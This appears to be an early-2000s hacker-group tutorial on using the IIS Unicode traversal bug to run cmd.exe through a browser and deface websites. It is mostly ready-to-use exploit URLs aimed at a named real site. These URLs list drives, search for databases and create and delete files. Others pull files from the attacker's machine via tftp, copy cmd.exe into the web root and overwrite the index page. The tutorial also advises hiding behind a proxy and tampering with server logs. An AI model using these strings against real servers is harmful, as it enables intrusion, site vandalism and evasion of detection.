RRRRRRRRRRRRRRRRR FFFFFFFFFFFFFFFFFFFF
RRRRRRRRRRRRRRRRRR FFFFFFFFFFFFFFFFFFFF
RRRRRRRRRRRRRRRRRRR FFFF
RRRR RRRRR FFFF
RRRR RRRRR FFFF
RRRR RRRR FFFF
RRRRRRRRRRRRRRRRR FFFFFFFFFFFF
RRRRRRRRRRRRRRR OOOOOOOOOOOOOO FFFFFFFFFFFF
RRRRRRRRRRRRRRR OOOOOOOOOOOOOO FFFF
RRRR RRRRRRR OOOO OOOO FFFF
RRRR RRRRRRR OOOO OOOO FFFF
RRRR RRRRRRR OOOO OOOO FFFF
RRRR RRRRRR OOOO OOOO FFFF
RRRR RRRRRR OOOO OOOO FFFF
RRRR RRRRRR OOOO OOOO FFFF
RRRR RRRRRR OOOOOOOOOOOOOO FFFF
RRRR RRRRRRR OOOOOOOOOOOOOO FFFF
RRRR RRRRRRRRR FFFF
:::::::::===============:::::::::::
I I S
E X P L O I T (Defacing sites)
:::::::::===============:::::::::::
Ok well I have been asked by many how to hack websites. I try to help out,
but most are too far behind to know what I'm talking about.
So in this tutorial I will tell you about the IIS exploit and how to efficiently use it to get what you want.
This tutorial will remain the property of Reign of Fire. Please do not copy this tutorial without permission from me AcId R3IgN.
Thank you.
Also, if you're having problems reading this because you have to scroll too far, just turn word wrap on... then you can print the whole document. :)
Ok the first step is finding an exploitable system.
Now I have no programs for doing this so you'll have to do this the hard and long way.
But who cares, hackers like to do it the hard way don't they? :)
Now, what you will have to do is find out in which part of the system the bug can be exploited.
These are the directories of the system where the bug can be exploited...
1. /IISADMPWD
2. /scripts
3. /msadc
4. /wwwroot
5. /cgi-bin
6. /_vti_bin
Ok now, what you have to do is open up your internet browser..
Yes that's all you need, just your simple internet browser. You could download some hacker program to do all this automatically, but we're gonna do it the 1337 way. :)
Ok once you've opened the browser you have to put some special strings in the URL field after the specific URL to see if it is exploitable.
Now here's how we do it.
We will take www.tombraider.com as an example. (That one just popped into my head, if you're wondering.)
Now this site WAS exploitable, but now it has been patched up.. I think. And I hope.
Now the actual exploit is a string, made up of some bits and pieces.
This is the string..
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
Notice that when you put this string at the end of the URL you SHOULD get a directory listing of the specific drive.
Eg:
http://www.tombraider.com/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
Now if this server is exploitable and the exploit is in the /IISADMPWD dir then you will get a DIR listing.
If you see nothing, and get nothing but an error then you should move on to the next dir... such as /scripts.
So all you would do with the above example is change the /IISADMPWD bit to /scripts and see if you get a DIR listing.
If you have done all the dirs and you still have had no DIR listing then I guess you'll have to move on to the next system.
I also suggest that before you even try this you check whether the server is running Microsoft IIS on an NT server.
There are many ways to check this (many programs, methods and sites), and I say it's wise to do so: if you are trying the IIS exploit on a certain system but it is not running Microsoft's NT and is running Apache instead, then obviously you are wasting your time, so you would either move on to the next system or try to hack into this Apache (or whatever) server.
Now I will list all of the above dir strings in a list for you.
1. Url of the Server/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
2. Url of the Server/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
3. Url of the Server/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
4. Url of the Server/wwwroot/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
5. Url of the Server/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
6. Url of the Server/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir
And there you have them..
Now I have found that the most common string would be the /scripts one, but if you find nothing there then just move on to the next string.
Ok so what if you have found a DIR listing with one of the exploits?
=====================================================================
Well once you have found a DIR listing then you can do a heap of commands with this exploit.
It's just like commanding your own computer from DOS, (you will have to know some windows commands if you don't already).
Now I will give you a few examples of some things you can do, and the rest you can probably figure out yourselves.
1. Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir\c%20c:\
eg: http://www.tombraider.com/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir\c%20c:\
This will list the contents of C:\
2. Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20/S%20c:\*.mdb
This will list all mdb's available.
3. Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20echo%20uhauhauhua>%20test.txt
This will make a test.txt file
4. Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20del%20c:\test.txt
This will delete test.txt
5. Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20type\c%20c:\teste.mdb
This will download the file test.txt and try to open it. You won't succeed, because the "type" will insert a line of code into that file, but if you know how to crack basic files this should be no problem.
So you get the point now.... you can try commands like echo, del, mkdir, attrib.. whatever.. ok?
Now how would we go about uploading files??
===========================================
Hm.. well the first thing we need is TFTP. This is a program that allows you to upload and download files to a remote server.
Now this is a small program so this can be downloaded everywhere, try www.downloads.com.
And I will add it to my site too.. http://rofhackers.cjb.net/ very soon.
Now let's just pretend that you have TFTP installed on your computer (if you have it, good; if you don't, get it).
Now this is the string you will need to type in your browser for you to download/upload something to the server.
Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20tftp%20-i%20[here you will add your IP]%20get%20[here you will enter the file location where the file is on your own box]%20[here you will add the location on the Server where you want the file to be uploaded to]
eg:
Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20tftp%20-i%20200.200.200.200%20get%20c:\windows\calc.exe%20c:\winnt\system32\calc.exe
Understand?? If you don't then just read over it a couple of times, you'll get it.
Now to change the index.htm (or the main page of the site).
I have found that on lots of servers the name of the html page could be the following.
default.htm, default.asp, index.htm, and index.asp.
It could be any of those, so you will need to look carefully for the one that you need.
Ok now lets say the file is called index.htm..
and lets say we find this file in C:\inetpub\wwwroot\index.htm
(the html files are nearly always in this directory)
You would type the following.
Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20copy%20c:\winnt\system32\cmd.exe%20c:\inetpub\wwwroot\"any file".exe
Results are as follows:
- Copies cmd.exe to the same folder where the index is located.
Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/inetpub/wwwroot/any type.exe?/c%20echo%20index information that is what you want to display on index>%20index.htm
This is the second example:
============================
Lets just pretend that the index page is on:
d:\inetpub\wwwroot\index.htm
- If for some weird reason the server is on C: and the index is located on a different drive, then proceed as follows.
Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20echo%20AcId R3IgN is da man>%20c:\test.txt
- Creates a text file with the content "AcId R3IgN is da man"
Url of the page/Exploited dir/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20copy%20/y%20c:\test.txt%20d:\inetpub\wwwroot\index.htm
- Copies the content of test.txt to index.htm
So thats it...
This concludes our tutorial into hacking a windows NT server with your browser.
This tutorial might have been a bit hard to understand... and I forgive you for that.
But if you read over it a few times, and use your common sense, then you will figure the rest out for yourself.
Also it is IMPERATIVE that before you begin, you use a PROXY SERVER.
As all servers will log your IP, and all activity, and you don't wanna get busted do ya? ;)
Also THE LOGS ARE BY DEFAULT ON C:\WINNT\SYSTEM32\LOGFILES\W3SVC32
W3SVC32 - IS THE DEFAULT FOLDER WHERE THE LOG FILES ARE, IF THE FOLDER IS NOT THERE TRY TO
FIND IT AND UPDATE IT AS NEEDED.
Isn't there an easier way? I hear you say!
===========================================
Well yes, in fact there are tons of easier ways to do this.
You can get heaps of programs from the net... and a member of ours is making a program to exploit this.
And we hope he shares it with us, because we've been having a few problems, so BOOT DADDY, if you're reading this, we would really like to
have your program on our site.
I am of course planning to make my own program, but I have actually little time to do this, it even took me a while to write a tutorial.
(probably 2 mins a day is all I have time for) But hey..
I finished it. :)
You could however make your own program using these strings, and hack pages using your own program.
This is the most 1337 way to do things.. (making a program, and using it to exploit a system)
It's way better than downloading a program made by someone else, and using that like a script kiddie, right? :)
Well happy hacking.
Greetz:
========
Greetz goto my girlfriend Evi, for putting up with me when I left her downstairs playing the playstation while I went up stairs to sit at my computer.
I'm really sorry for that.
EnragedJerry, for being just a cool dude. I've helped him out a bit, and he's kept me company while I was just sittin around. So congrats on your hacks dude.
My parents, for never seeing me.. :) I'm always in my bedroom behind my computer... sorry guys.
My whole family, for being family I s'pose.
The BOX network, for their cool chat sessions.
Reign of Fire... cause they rule.. ;)
WoH -- They are the best.. No|d and RaFa rule! :) Yo dudes.
My friends... Thommy and Timpie.
Boot Daddy, for making a program for us.
And my computer for not crashing on me, and doing what I want :) LOL Thank you babe. :)
Well see yas.
AcId R3IgN
rofhackers@yahoo.com
webmaster@rofhackers.org
http://rofhackers.cjb.net/
(geocities.com/eljehad1)